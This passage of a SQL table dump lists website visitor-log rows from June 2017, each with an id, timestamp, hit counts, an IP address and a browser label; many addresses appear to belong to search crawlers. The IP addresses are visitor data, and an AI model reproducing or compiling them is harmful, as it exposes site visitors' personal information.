498192605,1,1,0,0,'37.9.113.11','other'),(124890,1498192729,1,1,0,0,'217.182.132.174','other'),(124891,1498193102,1,1,0,0,'178.154.189.10','other'),(124892,1498193216,1,1,0,0,'5.255.253.46','other'),(124893,1498193316,1,1,0,0,'91.196.178.65','firefox'),(124894,1498193762,1,1,0,0,'5.255.253.54','other'),(124895,1498193826,1,1,0,0,'141.8.132.47','other'),(124896,1498193935,1,1,0,0,'5.255.253.23','other'),(124897,1498194163,1,1,0,0,'66.102.9.38','chrome'),(124898,1498194283,1,1,0,0,'188.166.82.214','chrome'),(124899,1498194389,1,1,0,0,'141.8.142.134','other'),(124900,1498194464,1,1,0,0,'178.154.200.27','other'),(124901,1498194504,1,1,0,0,'164.132.161.76','other'),(124902,1498194726,1,1,0,0,'5.255.253.54','other'),(124903,1498194876,1,1,0,0,'164.132.161.11','other'),(124904,1498194946,1,1,0,0,'51.255.65.84','other'),(124905,1498195240,1,1,0,0,'91.209.11.236','other'),(124906,1498195271,2,2,0,0,'141.8.142.152','other'),(124907,1498195332,1,1,0,0,'141.8.142.134','other'),(124908,1498195360,1,1,0,0,'141.8.132.47','other'),(124909,1498195529,1,1,0,0,'164.132.161.84','other'),(124910,1498195706,1,1,0,0,'54.165.59.7','other'),(124911,1498195750,1,1,0,0,'5.255.253.23','other'),(124912,1498195776,1,1,0,0,'5.255.253.27','other'),(124913,1498195955,1,1,0,0,'51.255.65.32','other'),(124914,1498196197,1,1,0,0,'51.255.65.67','other'),(124915,1498196401,1,1,0,0,'217.182.132.172','other'),(124916,1498196583,1,1,0,0,'164.132.161.28','other'),(124917,1498196668,1,1,0,0,'178.92.137.248','chrome'),(124918,1498196805,1,1,0,0,'217.182.132.7','other'),(124919,1498197433,1,1,0,0,'54.165.59.7','other'),(124920,1498197605,1,1,0,0,'51.255.65.65','other'),(124921,1498198063,2,2,0,0,'178.95.202.149','firefox'),(124922,1498198222,1,1,0,0,'164.132.161.88','other'),(124923,1498198376,1,1,0,0,'217.69.133.9','other'),(124924,1498199326,1,1,0,0,'91.196.178.162','chrome'),(124925,1498199594,1,1,0,0,'217.182.132.148','other'),(124926,1498199603,1,1,0,0,'8.29.198.26','other'),(124927,1498200823,1,1,0,0,'91.196.178.71','firefox'),(124928,1498200917,1,1,0,0,'164.132.161.19','other'),(124929,1498200991,1,1,0,0,'51.255.65.8','other'),(124930,1498201138,2,2,0,0,'163.172.74.103','other'),(124931,1498201255,1,1,0,0,'51.255.65.92','other'),(124932,1498201269,1,1,0,0,'51.255.65.65','other'),(124933,1498201370,1,1,0,0,'195.69.221.54','chrome'),(124934,1498201414,1,1,0,0,'46.219.61.42','chrome'),(124935,1498201548,1,1,0,0,'164.132.161.29','other'),(124936,1498202244,1,1,0,0,'164.132.161.71','other'),(124937,1498202397,1,1,0,0,'195.69.221.54','chrome'),(124938,1498202493,1,1,0,0,'91.196.178.68','firefox'),(124939,1498202876,1,1,0,0,'217.182.132.78','other'),(124940,1498202892,1,0,1,0,'68.180.230.48',''),(124941,1498203086,1,1,0,0,'217.182.132.37','other'),(124942,1498203223,1,1,0,0,'91.196.178.71','firefox'),(124943,1498203314,1,1,0,0,'40.77.167.42','other'),(124944,1498204033,1,1,0,0,'199.58.86.209','other'),(124945,1498204151,1,1,0,0,'164.132.161.59','other'),(124946,1498204274,2,0,2,0,'66.249.69.71',''),(124947,1498204424,1,1,0,0,'51.255.65.20','other'),(124948,1498204462,1,1,0,0,'51.255.71.100','other'),(124949,1498204465,2,2,0,0,'217.182.132.185','other'),(124950,1498205135,1,1,0,0,'217.182.132.77','other'),(124951,1498205514,1,1,0,0,'51.255.65.27','other'),(124952,1498205542,1,0,1,0,'66.249.64.15',''),(124953,1498205587,1,1,0,0,'51.255.65.36','other'),(124954,1498205893,1,1,0,0,'141.8.142.51','other'),(124955,1498206307,1,1,0,0,'40.77.167.60','other'),(124956,1498206351,1,1,0,0,'51.255.71.122','other'),(124957,1498206537,1,1,0,0,'217.182.132.172','other'),(124958,1498206551,1,1,0,0,'51.255.71.111','other'),(124959,1498206656,1,1,0,0,'164.132.161.63','other'),(124960,1498206751,1,1,0,0,'91.196.178.68','chrome'),(124961,1498207084,1,1,0,0,'66.249.64.15','chrome'),(124962,1498207275,1,1,0,0,'46.200.119.83','chrome'),(124963,1498207338,2,2,0,0,'91.209.11.236','other'),(124964,1498207623,1,1,0,0,'193.19.152.14','chrome'),(124965,1498207648,1,1,0,0,'66.249.64.135','chrome'),(124966,1498208777,1,1,0,0,'51.255.65.47','other'),(124967,1498209064,1,1,0,0,'91.209.11.236','other'),(124968,1498209183,1,1,0,0,'164.132.161.61','other'),(124969,1498209356,1,1,0,0,'217.182.132.84','other'),(124970,1498209400,1,1,0,0,'51.255.65.60','other'),(124971,1498209769,1,1,0,0,'217.182.132.59','other'),(124972,1498209810,1,1,0,0,'66.249.64.15','chrome'),(124973,1498210428,1,1,0,0,'8.29.198.25','other'),(124974,1498210545,1,1,0,0,'217.182.132.173','other'),(124975,1498210605,1,1,0,0,'164.132.162.153','other'),(124976,1498210883,1,1,0,0,'217.182.132.6','other'),(124977,1498210973,1,1,0,0,'51.255.65.75','other'),(124978,1498211024,1,1,0,0,'164.132.161.29','other'),(124979,1498211103,1,1,0,0,'217.182.132.172','other'),(124980,1498211207,1,1,0,0,'164.132.161.23','other'),(124981,1498211334,1,1,0,0,'164.132.161.84','other'),(124982,1498211532,1,1,0,0,'66.249.64.14','chrome'),(124983,1498211752,1,1,0,0,'178.95.246.83','chrome'),(124984,1498211964,2,2,0,0,'91.209.11.236','other'),(124985,1498212326,1,1,0,0,'51.255.65.62','other'),(124986,1498212433,1,1,0,0,'46.118.156.191','firefox'),(124987,1498212438,1,1,0,0,'176.31.231.10','other'),(124988,1498212719,1,1,0,0,'51.255.65.75','other'),(124989,1498212818,1,1,0,0,'217.182.132.149','other'),(124990,1498212851,1,1,0,0,'217.182.132.55','other'),(124991,1498213124,1,0,1,0,'66.249.64.15',''),(124992,1498213422,1,1,0,0,'91.209.11.236','other'),(124993,1498213899,1,1,0,0,'91.196.178.130','firefox'),(124994,1498213953,1,1,0,0,'217.69.133.3','other'),(124995,1498214353,4,4,0,0,'91.209.11.236','other'),(124996,1498214364,1,1,0,0,'137.74.207.101','other'),(124997,1498214668,1,1,0,0,'51.255.65.58','other'),(124998,1498215317,1,1,0,0,'91.196.177.44','chrome'),(124999,1498215505,1,1,0,0,'66.102.9.25','chrome'),(125000,1498215629,1,0,1,0,'66.249.64.16',''),(125001,1498215705,1,1,0,0,'217.182.132.146','other'),(125002,1498216282,1,1,0,0,'51.255.65.27','other'),(125003,1498216704,1,0,1,0,'66.249.64.15',''),(125004,1498216773,1,1,0,0,'137.74.201.99','other'),(125005,1498216781,1,1,0,0,'164.132.161.9','other'),(125006,1498217235,2,2,0,0,'91.209.11.236','other'),(125007,1498217287,1,1,0,0,'188.35.22.19','msie'),(125008,1498217387,1,1,0,0,'51.255.65.20','other'),(125009,1498218452,1,1,0,0,'51.255.65.67','other'),(125010,1498218516,1,1,0,0,'51.255.65.59','other'),(125011,1498218750,1,0,1,0,'66.249.64.130',''),(125012,1498218796,1,1,0,0,'92.112.124.12','chrome'),(125013,1498219018,1,1,0,0,'51.255.71.119','other'),(125014,1498219068,1,1,0,0,'77.222.134.100','firefox'),(125015,1498219165,1,1,0,0,'217.182.132.190','other'),(125016,1498219236,1,1,0,0,'217.182.132.25','other'),(125017,1498219513,1,1,0,0,'51.255.65.17','other'),(125018,1498220087,1,1,0,0,'31.13.113.187','other'),(125019,1498220088,1,1,0,0,'193.107.245.133','other'),(125020,1498220121,1,1,0,0,'164.132.161.82','other'),(125021,1498220171,1,1,0,0,'176.31.231.10','other'),(125022,1498220324,1,0,1,0,'66.249.64.135',''),(125023,1498220650,1,0,1,0,'68.180.230.48',''),(125024,1498220806,1,1,0,0,'217.182.132.93','other'),(125025,1498220824,1,1,0,0,'66.249.64.133','chrome'),(125026,1498221263,1,1,0,0,'8.29.198.26','other'),(125027,1498221514,1,1,0,0,'163.172.108.151','chrome'),(125028,1498221713,1,1,0,0,'164.132.161.87','other'),(125029,1498221784,1,1,0,0,'217.182.132.76','other'),(125030,1498222331,1,1,0,0,'51.255.71.133','other'),(125031,1498222485,1,1,0,0,'51.255.71.112','other'),(125032,1498222911,1,1,0,0,'40.77.167.42','other'),(125033,1498222942,1,1,0,0,'164.132.161.55','other'),(125034,1498223224,1,1,0,0,'178.95.247.243','firefox'),(125035,1498223307,1,1,0,0,'164.132.161.18','other'),(125036,1498224183,1,0,1,0,'66.249.64.14',''),(125037,1498224290,1,1,0,0,'164.132.161.88','other'),(125038,1498224492,1,1,0,0,'217.182.132.150','other'),(125039,1498224697,1,1,0,0,'51.255.65.36','other'),(125040,1498224778,2,0,2,0,'66.249.64.130',''),(125041,1498225053,1,1,0,0,'66.249.69.73','chrome'),(125042,1498225311,1,1,0,0,'217.69.133.194','other'),(125043,1498226407,1,1,0,0,'51.255.65.62','other'),(125044,1498226453,1,1,0,0,'180.76.15.147','other'),(125045,1498226743,2,2,0,0,'217.182.132.153','other'),(125046,1498226986,1,1,0,0,'51.255.65.73','other'),(125047,1498227279,1,1,0,0,'40.77.167.60','other'),(125048,1498227356,1,1,0,0,'188.32.176.228','msie'),(125049,1498227375,1,0,1,0,'68.180.230.48',''),(125050,1498227546,1,1,0,0,'217.182.132.170','other'),(125051,1498227565,1,0,1,0,'66.249.64.15',''),(125052,1498228103,1,1,0,0,'54.165.59.7','other'),(125053,1498228350,1,1,0,0,'176.193.120.208','chrome'),(125054,1498228538,1,1,0,0,'167.114.172.223','other'),(125055,1498228558,1,1,0,0,'167.114.172.223','chrome'),(125056,1498229207,1,1,0,0,'213.108.41.135','chrome'),(125057,1498229749,1,1,0,0,'164.132.161.81','other'),(125058,1498229898,2,2,0,0,'54.165.59.7','other'),(125059,1498230166,1,1,0,0,'217.182.132.21','other'),(125060,1498231114,1,0,1,0,'66.249.64.157',''),(125061,1498231119,1,1,0,0,'95.221.246.126','msie'),(125062,1498231149,1,0,1,0,'66.249.64.155',''),(125063,1498231184,1,0,1,0,'66.249.64.15',''),(125064,1498231290,1,1,0,0,'51.255.65.83','other'),(125065,1498231403,1,1,0,0,'54.165.59.7','other'),(125066,1498232096,1,1,0,0,'8.29.198.26','other'),(125067,1498232112,1,1,0,0,'216.244.66.237','other'),(125068,1498232197,1,1,0,0,'157.55.39.160','other'),(125069,1498232879,1,1,0,0,'164.132.162.160','other'),(125070,1498232989,1,0,1,0,'66.249.64.153',''),(125071,1498233280,1,1,0,0,'51.255.65.43','other'),(125072,1498233618,1,1,0,0,'164.132.161.38','other'),(125073,1498233820,1,1,0,0,'51.255.65.5','other'),(125074,1498234135,1,1,0,0,'51.255.65.44','other'),(125075,1498234231,1,1,0,0,'164.132.161.43','other'),(125076,1498235474,1,1,0,0,'51.255.65.34','other'),(125077,1498235649,1,1,0,0,'5.255.253.54','other'),(125078,1498235942,1,1,0,0,'164.132.161.49','other'),(125079,1498236070,1,1,0,0,'217.182.132.241','other'),(125080,1498236310,1,1,0,0,'137.74.207.188','other'),(125081,1498236828,1,0,1,0,'66.249.64.30',''),(125082,1498236897,1,0,1,0,'66.249.64.28',''),(125083,1498237100,1,1,0,0,'217.182.132.73','other'),(125084,1498237195,1,1,0,0,'217.182.132.51','other'),(125085,1498237224,1,1,0,0,'83.149.126.98','other'),(125086,1498237746,1,1,0,0,'217.182.132.174','other'),(125087,1498237748,1,1,0,0,'178.140.88.94','msie'),(125088,1498237997,1,1,0,0,'51.255.65.25','other'),(125089,1498238352,1,0,1,0,'66.249.64.155',''),(125090,1498238834,1,1,0,0,'164.132.161.36','other'),(125091,1498238937,1,1,0,0,'178.154.200.12','other'),(125092,1498238939,1,1,0,0,'87.250.224.19','other'),(125093,1498238954,1,1,0,0,'176.193.143.69','msie'),(125094,1498238990,1,1,0,0,'217.182.132.240','other'),(125095,1498239307,1,1,0,0,'40.77.167.42','other'),(125096,1498239370,1,1,0,0,'217.182.132.17','other'),(125097,1498239637,1,1,0,0,'51.255.65.31','other'),(125098,1498239822,1,1,0,0,'51.255.65.95','other'),(125099,1498240375,1,1,0,0,'164.132.162.160','other'),(125100,1498241184,1,1,0,0,'51.255.71.130','other'),(125101,1498241305,1,1,0,0,'217.182.132.84','other'),(125102,1498241346,1,1,0,0,'164.132.161.20','other'),(125103,1498242248,1,1,0,0,'51.255.65.97','other'),(125104,1498242575,1,1,0,0,'217.182.132.25','other'),(125105,1498242777,1,0,1,0,'66.249.64.157',''),(125106,1498242891,2,2,0,0,'66.249.64.28','chrome'),(125107,1498242925,1,1,0,0,'8.29.198.26','other'),(125108,1498243135,1,1,0,0,'164.132.161.55','other'),(125109,1498243172,1,1,0,0,'66.249.64.29','chrome'),(125110,1498243206,1,1,0,0,'66.249.64.155','chrome'),(125111,1498243844,1,1,0,0,'164.132.162.164','other'),(125112,1498244363,1,0,1,0,'66.249.64.29',''),(125113,1498244694,1,1,0,0,'217.182.132.67','other'),(125114,1498245037,1,1,0,0,'163.172.108.151','chrome'),(125115,1498245283,1,1,0,0,'137.74.207.119','other'),(125116,1498245343,1,1,0,0,'51.255.65.46','other'),(125117,1498245452,1,1,0,0,'51.255.71.115','other'),(125118,1498245502,1,1,0,0,'66.249.64.155','chrome'),(125119,1498246171,1,1,0,0,'137.74.207.116','other'),(125120,1498246712,1,1,0,0,'51.255.71.118','other'),(125121,1498246889,1,1,0,0,'164.132.161.72','other'),(125122,1498247286,1,1,0,0,'51.255.65.60','other'),(125123,1498247482,1,1,0,0,'164.132.161.16','other'),(125124,1498247831,1,1,0,0,'66.249.64.28','chrome'),(125125,1498247834,1,1,0,0,'217.182.132.83','other'),(125126,1498247942,1,1,0,0,'180.76.15.31','other'),(125127,1498248086,1,1,0,0,'91.209.11.236','other'),(125128,1498248091,1,1,0,0,'91.196.178.166','chrome'),(125129,1498248129,1,1,0,0,'69.30.221.250','other'),(125130,1498248231,2,0,2,0,'66.249.64.155',''),(125131,1498248339,1,1,0,0,'217.182.132.33','other'),(125132,1498248504,1,0,1,0,'66.249.64.157',''),(125133,1498248878,1,1,0,0,'51.255.65.31','other'),(125134,1498248892,1,1,0,0,'66.249.64.153','chrome'),(125135,1498249405,1,1,0,0,'137.74.207.164','other'),(125136,1498249431,1,1,0,0,'217.182.132.7','other'),(125137,1498249773,1,1,0,0,'51.255.65.78','other'),(125138,1498249986,1,1,0,0,'51.255.65.15','other'),(125139,1498250085,2,2,0,0,'91.209.11.236','other'),(125140,1498250414,1,1,0,0,'66.249.64.28','chrome'),(125141,1498251550,1,1,0,0,'164.132.161.7','other'),(125142,1498251795,1,1,0,0,'51.255.71.131','other'),(125143,1498251895,1,1,0,0,'66.249.66.157','chrome'),(125144,1498252322,1,1,0,0,'91.209.11.236','other'),(125145,1498253044,1,1,0,0,'216.244.66.237','other'),(125146,1498253331,2,2,0,0,'146.185.223.114','other'),(125147,1498253566,1,0,1,0,'66.249.69.71',''),(125148,1498253751,1,1,0,0,'8.29.198.26','other'),(125149,1498254527,1,1,0,0,'217.182.132.23','other'),(125150,1498254761,1,1,0,0,'151.80.27.116','other'),(125151,1498255037,1,1,0,0,'217.69.133.4','other'),(125152,1498255151,1,0,1,0,'66.249.66.74',''),(125153,1498255738,2,2,0,0,'141.8.132.47','other'),(125154,1498255760,5,5,0,0,'178.154.200.42','other'),(125155,1498255935,1,1,0,0,'95.108.213.25','other'),(125156,1498256058,6,6,0,0,'5.255.253.54','other'),(125157,1498256153,4,4,0,0,'141.8.142.134','other'),(125158,1498256263,8,8,0,0,'141.8.142.152','other'),(125159,1498256510,1,1,0,0,'37.9.113.11','other'),(125160,1498256580,2,2,0,0,'51.255.65.52','other'),(125161,1498256667,1,1,0,0,'141.8.132.47','other'),(125162,1498256722,1,1,0,0,'51.255.65.47','other'),(125163,1498256945,1,1,0,0,'178.154.200.42','other'),(125164,1498256983,3,3,0,0,'5.255.253.54','other'),(125165,1498257026,1,1,0,0,'37.204.56.120','chrome'),(125166,1498257059,1,1,0,0,'164.132.161.22','other'),(125167,1498257368,1,0,1,0,'66.249.69.67',''),(125168,1498257508,1,1,0,0,'37.9.113.11','other'),(125169,1498257559,1,1,0,0,'95.108.213.25','other'),(125170,1498257999,1,0,1,0,'66.249.75.29',''),(125171,1498258019,1,1,0,0,'66.249.75.29','chrome'),(125172,1498258272,1,1,0,0,'51.255.65.87','other'),(125173,1498258338,1,1,0,0,'51.255.65.68','other'),(125174,1498258485,1,1,0,0,'180.76.15.142','other'),(125175,1498258735,10,10,0,0,'69.58.178.58','other'),(125176,1498258873,1,1,0,0,'164.132.161.86','other'),(125177,1498259324,1,1,0,0,'217.182.132.23','other'),(125178,1498260443,1,0,1,0,'66.249.69.71',''),(125179,1498260681,1,1,0,0,'164.132.161.6','other'),(125180,1498260811,1,1,0,0,'164.132.161.27','other'),(125181,1498261000,1,1,0,0,'164.132.161.82','other'),(125182,1498263149,1,1,0,0,'217.182.132.72','other'),(125183,1498263233,1,1,0,0,'40.77.167.60','other'),(125184,1498263847,1,1,0,0,'137.74.207.108','other'),(125185,1498263920,1,1,0,0,'217.182.132.187','other'),(125186,1498264592,1,1,0,0,'8.29.198.25','other'),(125187,1498264825,1,1,0,0,'217.182.132.172','other'),(125188,1498265236,1,1,0,0,'51.255.71.131','other'),(125189,1498265376,1,1,0,0,'164.132.161.47','other'),(125190,1498265697,1,1,0,0,'178.140.81.108','msie'),(125191,1498266071,1,0,1,0,'66.249.69.73',''),(125192,1498266750,1,1,0,0,'217.182.132.184','other'),(125193,1498267015,1,1,0,0,'164.132.161.66','other'),(125194,1498267193,1,1,0,0,'164.132.161.21','other'),(125195,1498267225,1,1,0,0,'164.132.162.156','other'),(125196,1498267821,1,1,0,0,'217.182.132.193','other'),(125197,1498268752,1,1,0,0,'164.132.161.39','other'),(125198,1498268917,1,0,1,0,'66.249.75.28',''),(125199,1498268999,1,1,0,0,'164.132.161.38','other'),(125200,1498269186,5,5,0,0,'193.70.39.201','other'),(125201,1498269765,1,1,0,0,'51.255.71.132','other'),(125202,1498269772,1,1,0,0,'164.132.161.60','other'),(125203,1498270292,1,1,0,0,'51.255.65.78','other'),(125204,1498270733,1,1,0,0,'217.69.133.5','other'),(125205,1498270755,1,1,0,0,'157.55.39.221','other'),(125206,1498270784,1,1,0,0,'217.182.132.74','other'),(125207,1498271253,1,0,1,0,'66.249.75.28',''),(125208,1498271505,1,1,0,0,'164.132.161.57','other'),(125209,1498271692,1,1,0,0,'91.209.11.236','other'),(125210,1498272059,1,1,0,0,'51.255.71.123','other'),(125211,1498272151,1,1,0,0,'51.255.65.45','other'),(125212,1498273127,1,1,0,0,'217.182.132.193','other'),(125213,1498273334,4,4,0,0,'146.185.129.106','other'),(125214,1498273840,1,1,0,0,'51.255.71.125','other'),(125215,1498274172,2,2,0,0,'91.209.11.236','other'),(125216,1498274182,1,1,0,0,'164.132.162.157','other'),(125217,1498274522,1,1,0,0,'217.182.132.83','other'),(125218,1498274587,1,1,0,0,'146.185.129.106','other'),(125219,1498275419,1,1,0,0,'8.29.198.26','other'),(125220,1498275451,1,1,0,0,'95.221.214.215','msie'),(125221,1498275562,1,1,0,0,'66.249.75.30','chrome'),(125222,1498275875,1,1,0,0,'217.182.132.91','other'),(125223,1498275923,1,0,1,0,'66.249.75.29',''),(125224,1498276369,1,1,0,0,'217.182.132.90','other'),(125225,1498276693,1,1,0,0,'217.182.132.157','other'),(125226,1498276863,1,1,0,0,'146.185.223.114','chrome'),(125227,1498277069,1,1,0,0,'51.255.65.16','other'),(125228,1498277194,1,0,1,0,'66.249.69.73',''),(125229,1498277236,1,0,1,0,'66.249.75.28',''),(125230,1498277248,2,2,0,0,'91.209.11.236','other'),(125231,1498277316,1,1,0,0,'157.55.39.221','other'),(125232,1498277361,1,1,0,0,'217.182.132.241','other'),(125233,1498277525,1,1,0,0,'66.249.69.67','chrome'),(125234,1498277545,1,1,0,0,'217.182.132.190','other'),(125235,1498277576,1,1,0,0,'164.132.161.33','other'),(125236,1498277735,1,1,0,0,'164.132.161.52','other'),(125237,1498277850,1,1,0,0,'51.255.65.46','other'),(125238,1498277887,1,1,0,0,'51.255.65.5','other'),(125239,1498277916,1,1,0,0,'51.255.65.6','other'),(125240,1498277941,1,1,0,0,'51.255.65.33','other'),(125241,1498278553,1,1,0,0,'217.182.132.96','other'),(125242,1498278971,1,1,0,0,'217.182.132.14','other'),(125243,1498279199,1,1,0,0,'217.182.132.81','other'),(125244,1498279269,1,0,1,0,'66.249.69.71',''),(125245,1498279311,2,0,2,0,'66.249.75.29',''),(125246,1498279467,1,1,0,0,'51.255.71.122','other'),(125247,1498279536,1,1,0,0,'51.255.65.75','other'),(125248,1498279720,1,1,0,0,'157.55.39.160','other'),(125249,1498279774,1,1,0,0,'51.255.65.89','other'),(125250,1498280364,1,0,1,0,'66.249.69.73',''),(125251,1498280405,1,1,0,0,'164.132.161.49','other'),(125252,1498280548,1,1,0,0,'164.132.161.23','other'),(125253,1498280730,1,1,0,0,'66.249.75.28','chrome'),(125254,1498280919,1,1,0,0,'51.255.71.123','other'),(125255,1498280974,1,1,0,0,'180.76.15.138','other'),(125256,1498281522,4,4,0,0,'141.8.142.152','other'),(125257,1498281617,1,1,0,0,'51.255.71.113','other'),(125258,1498281643,3,3,0,0,'5.255.253.23','other'),(125259,1498281799,1,1,0,0,'51.255.71.122','other'),(125260,1498281830,1,1,0,0,'40.77.167.42','other'),(125261,1498282030,4,4,0,0,'141.8.132.47','other'),(125262,1498282153,1,1,0,0,'5.255.253.16','other'),(125263,1498282164,1,1,0,0,'5.255.253.27','other'),(125264,1498282252,6,6,0,0,'178.154.200.42','other'),(125265,1498282302,8,8,0,0,'5.255.253.54','other'),(125266,1498282322,2,2,0,0,'37.9.113.11','other'),(125267,1498282396,2,2,0,0,'141.8.142.134','other'),(125268,1498282552,5,5,0,0,'141.8.142.152','other'),(125269,1498282611,1,1,0,0,'151.80.27.116','other'),(125270,1498282779,1,1,0,0,'5.255.253.23','other'),(125271,1498282791,1,1,0,0,'141.8.142.142','other'),(125272,1498282817,1,0,1,0,'66.249.69.71',''),(125273,1498282931,3,3,0,0,'141.8.132.47','other'),(125274,1498283124,1,1,0,0,'51.255.65.58','other'),(125275,1498283173,1,1,0,0,'217.182.132.184','other'),(125276,1498283487,1,1,0,0,'178.154.200.42','other'),(125277,1498283500,4,4,0,0,'141.8.142.152','other'),(125278,1498283546,1,1,0,0,'95.133.193.92','other'),(125279,1498283558,1,1,0,0,'51.255.65.45','other'),(125280,1498283616,1,1,0,0,'141.8.132.49','other'),(125281,1498283628,2,2,0,0,'141.8.142.134','other'),(125282,1498283721,2,2,0,0,'5.255.253.23','other'),(125283,1498283781,2,2,0,0,'37.9.113.11','other'),(125284,1498284442,3,3,0,0,'141.8.132.47','other'),(125285,1498284447,1,1,0,0,'216.244.66.237','other'),(125286,1498284692,1,1,0,0,'66.249.75.30','chrome'),(125287,1498284751,1,1,0,0,'51.255.71.113','other'),(125288,1498284820,1,1,0,0,'141.8.142.134','other'),(125289,1498285136,2,2,0,0,'66.249.75.29','chrome'),(125290,1498285161,3,3,0,0,'91.209.11.236','other'),(125291,1498285562,1,1,0,0,'141.8.142.152','other'),(125292,1498285568,1,1,0,0,'141.8.132.49','other'),(125293,1498285609,1,1,0,0,'79.165.161.119','msie'),(125294,1498285709,1,1,0,0,'51.255.65.91','other'),(125295,1498285731,1,1,0,0,'5.255.253.54','other'),(125296,1498285759,1,1,0,0,'164.132.161.54','other'),(125297,1498285807,1,1,0,0,'51.255.65.14','other'),(125298,1498286068,2,2,0,0,'141.8.142.134','other'),(125299,1498286250,1,1,0,0,'8.29.198.25','other'),(125300,1498286307,1,1,0,0,'51.255.65.47','other'),(125301,1498286520,2,1,1,0,'66.249.75.29',''),(125302,1498286585,1,1,0,0,'66.249.75.30','chrome'),(125303,1498286685,2,1,1,0,'66.249.75.29',''),(125304,1498286709,1,0,1,0,'66.249.69.67',''),(125305,1498286754,1,1,0,0,'164.132.161.48','other'),(125306,1498286755,1,0,1,0,'66.249.69.71',''),(125307,1498286892,1,1,0,0,'51.255.71.116','other'),(125308,1498287218,1,1,0,0,'137.74.201.108','other'),(125309,1498287283,1,0,1,0,'66.249.75.28',''),(125310,1498287314,1,1,0,0,'5.255.253.54','other'),(125311,1498287398,2,2,0,0,'207.46.13.91','other'),(125312,1498287700,1,1,0,0,'217.182.132.183','other'),(125313,1498288018,1,1,0,0,'217.182.132.85','other'),(125314,1498288140,2,2,0,0,'66.249.69.71','chrome'),(125315,1498288720,2,2,0,0,'5.255.253.54','other'),(125316,1498288856,1,1,0,0,'164.132.161.81','other'),(125317,1498288985,1,1,0,0,'109.87.12.40','firefox'),(125318,1498289320,1,1,0,0,'217.69.133.4','other'),(125319,1498289761,1,1,0,0,'217.69.143.217','firefox'),(125320,1498289925,1,1,0,0,'178.154.200.42','other'),(125321,1498290296,1,1,0,0,'164.132.161.36','other'),(125322,1498290727,1,1,0,0,'51.255.65.66','other'),(125323,1498291205,1,1,0,0,'51.255.65.12','other'),(125324,1498291324,1,1,0,0,'62.212.73.211','other'),(125325,1498291427,1,1,0,0,'164.132.161.85','other'),(125326,1498291443,1,1,0,0,'217.182.132.146','other'),(125327,1498291647,1,0,1,0,'66.249.75.28',''),(125328,1498291863,1,1,0,0,'164.132.161.26','other'),(125329,1498291893,1,1,0,0,'51.255.65.8','other'),(125330,1498292197,1,1,0,0,'217.182.132.37','other'),(125331,1498292417,1,1,0,0,'217.182.132.68','other'),(125332,1498292508,1,1,0,0,'164.132.161.50','other'),(125333,1498293016,1,1,0,0,'172.252.126.184','chrome'),(125334,1498293101,1,1,0,0,'164.132.161.35','other'),(125335,1498293336,1,1,0,0,'164.132.162.154','other'),(125336,1498293604,1,1,0,0,'178.154.200.12','other'),(125337,1498293605,1,1,0,0,'95.108.179.17','other'),(125338,1498293787,1,0,1,0,'66.249.69.67',''),(125339,1498294364,1,1,0,0,'91.209.11.236','other'),(125340,1498294952,1,1,0,0,'66.249.75.28','chrome'),(125341,1498294963,1,1,0,0,'217.69.133.9','other'),(125342,1498295198,1,1,0,0,'164.132.161.90','other'),(125343,1498295236,1,1,0,0,'51.255.65.57','other'),(125344,1498295834,1,1,0,0,'164.132.161.54','other'),(125345,1498296308,1,1,0,0,'51.255.65.23','other'),(125346,1498296327,1,1,0,0,'51.255.65.78','other'),(125347,1498296507,1,1,0,0,'217.182.132.14','other'),(125348,1498296636,1,1,0,0,'164.132.161.2','other'),(125349,1498296843,1,1,0,0,'109.63.136.126','opera'),(125350,1498297039,1,1,0,0,'66.249.75.29','chrome'),(125351,1498297081,1,1,0,0,'8.29.198.27','other'),(125352,1498297193,1,1,0,0,'216.244.66.237','other'),(125353,1498297375,1,1,0,0,'91.209.11.236','other'),(125354,1498297724,1,1,0,0,'164.132.161.23','other'),(125355,1498297926,1,1,0,0,'217.182.132.75','other'),(125356,1498298698,1,1,0,0,'164.132.161.49','other'),(125357,1498299011,1,1,0,0,'91.196.178.166','chrome'),(125358,1498299175,1,1,0,0,'217.182.132.90','other'),(125359,1498299301,1,0,1,0,'66.249.69.73',''),(125360,1498299342,1,1,0,0,'91.209.11.236','other'),(125361,1498299555,1,1,0,0,'51.255.65.2','other'),(125362,1498299580,1,1,0,0,'51.255.65.68','other'),(125363,1498299726,1,1,0,0,'178.92.171.208','chrome'),(125364,1498299883,1,1,0,0,'51.255.65.28','other'),(125365,1498300962,3,3,0,0,'141.8.132.47','other'),(125366,1498301242,4,4,0,0,'141.8.142.152','other'),(125367,1498301338,5,5,0,0,'178.154.200.42','other'),(125368,1498301365,1,1,0,0,'217.182.132.78','other'),(125369,1498301401,5,5,0,0,'5.255.253.54','other'),(125370,1498301709,1,1,0,0,'164.132.161.17','other'),(125371,1498301811,3,3,0,0,'141.8.142.134','other'),(125372,1498301921,2,2,0,0,'141.8.132.47','other'),(125373,1498301959,1,1,0,0,'217.182.132.57','other'),(125374,1498302242,1,1,0,0,'164.132.161.47','other'),(125375,1498302582,1,1,0,0,'51.255.65.95','other'),(125376,1498302627,1,1,0,0,'46.48.13.161','chrome'),(125377,1498302839,2,2,0,0,'141.8.142.152','other'),(125378,1498302867,1,1,0,0,'141.8.142.134','other'),(125379,1498303171,1,0,1,0,'66.249.69.67',''),(125380,1498303377,1,1,0,0,'137.74.207.116','other'),(125381,1498303540,1,1,0,0,'51.255.65.81','other'),(125382,1498303979,1,1,0,0,'217.182.132.51','other'),(125383,1498304201,1,0,1,0,'66.249.75.28',''),(125384,1498304500,1,1,0,0,'51.255.71.100','other'),(125385,1498304514,1,1,0,0,'128.69.159.243','msie'),(125386,1498304749,1,0,1,0,'66.249.69.71',''),(125387,1498305157,1,1,0,0,'51.255.65.60','other'),(125388,1498305612,1,1,0,0,'217.182.132.97','other'),(125389,1498306279,1,1,0,0,'217.182.132.17','other'),(125390,1498306322,1,1,0,0,'51.255.71.130','other'),(125391,1498306602,1,1,0,0,'217.182.132.25','other'),(125392,1498306710,1,1,0,0,'91.194.90.171','other'),(125393,1498306756,1,1,0,0,'91.196.178.34','chrome'),(125394,1498306985,1,1,0,0,'217.182.132.95','other'),(125395,1498307660,1,1,0,0,'217.182.132.76','other'),(125396,1498307920,1,1,0,0,'8.29.198.25','other'),(125397,1498309082,1,1,0,0,'217.182.132.60','other'),(125398,1498309259,1,1,0,0,'164.132.162.160','other'),(125399,1498309341,1,1,0,0,'217.182.132.155','other'),(125400,1498310037,1,0,1,0,'66.249.69.71',''),(125401,1498310327,1,1,0,0,'217.182.132.90','other'),(125402,1498310464,1,1,0,0,'207.46.13.91','other'),(125403,1498310518,1,1,0,0